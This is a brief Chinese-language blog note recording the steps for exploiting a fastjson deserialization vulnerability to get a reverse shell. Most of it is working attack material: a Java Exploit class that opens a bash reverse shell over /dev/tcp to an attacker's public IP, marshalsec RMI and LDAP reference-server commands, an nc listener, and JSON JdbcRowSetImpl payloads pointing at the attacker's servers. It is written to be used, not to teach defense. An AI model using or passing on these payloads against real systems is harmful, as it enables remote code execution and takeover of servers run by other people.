fastjson 反弹shell

如下文章说得很不详细，只是用于记录我的步骤，初次利用的人，建议找别的博客文章学习。

1. 准备一台公网服务器
   cd test
   python -m SimpleHTTPServer 8888

2. javac Exploit.java
   里面的ip和端口改成你的

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;
 
 
public class Exploit{
    public Exploit() {}
 
    static
    {
        try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"bash", "-c", "/bin/bash -i >& /dev/tcp/【公网IP】/7778 0>&1"};
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
 
    public static void main(String[] args) {
        Exploit e = new Exploit();
        System.out.println("hello world");
    }
}

2. 上传到你的公网服务器
   Exploit.class
   marshalsec-0.0.3-SNAPSHOT-all.jar

# 有2个协议
RMI
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://【公网IP】/#Exploit 7776


LDAP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://【公网IP】/#Exploit 7776

3. 接受反弹shell的地方

nc -lvp 7778

4. http请求

# ldap
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://【公网IP】:7776/Exploit","autoCommit":true}}

# rmi
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://【公网IP】:7776/Exploit","autoCommit":true}}